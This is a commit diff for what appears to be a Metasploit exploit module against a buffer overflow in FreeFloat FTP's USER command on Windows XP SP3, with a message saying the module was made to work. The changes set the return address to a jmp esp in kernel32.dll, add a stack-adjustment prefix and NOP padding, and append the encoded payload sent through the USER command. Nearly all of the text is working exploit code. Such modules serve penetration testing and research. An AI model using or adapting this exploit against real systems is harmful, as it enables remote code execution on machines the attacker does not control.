got freefloatftp_user.rb working

Author: dougsko

modules/exploits/windows/ftp/freefloatftp_user.rb

@@ -33,28 +33,22 @@ def initialize(info = {})
 			'Privileged'	 => false,
 			'Payload'		 =>
 				{
-					'Space'          => 500,
+					'Space'          => 440,
 					'DisableNops'    => true,
 					'BadChars'       => "\x00\x0a\x0d",
-					#'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
-					'StackAdjustment' => -3500
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
 				},
-			'Targets'		 =>
+			'Targets'		=>
 				[
 					[ 'Windows XP SP3',
 						{
-							'Ret' => 0x7cb41020, # jmp esp 
-							#'Ret' => 0xDEADBEEF,
+							'Ret' => 0x7c83c2c5, # jmp esp kernel32.dll
 							'Offset'   => 230
 						}
 					],
 				],
 			'DefaultTarget' => 0,
 			'DisclosureDate' => 'Jun 12 2012'))
-		register_options(
-			[
-				#OptAddress.new('SOURCEIP', [false, 'The local client address'])
-			], self.class)
 	end
 
 	def check
@@ -71,9 +65,9 @@ def exploit
 		connect
 		buf = rand_text(target['Offset'])
 		buf << [ target['Ret'] ].pack('V')
-		#buf << payload.encoded
-		raw_send("USER #{buf}\r\n")
-		#send_user(buf)
+		buf << make_nops(12)
+		buf << payload.encoded
+		send_user(buf)
 		disconnect
 	end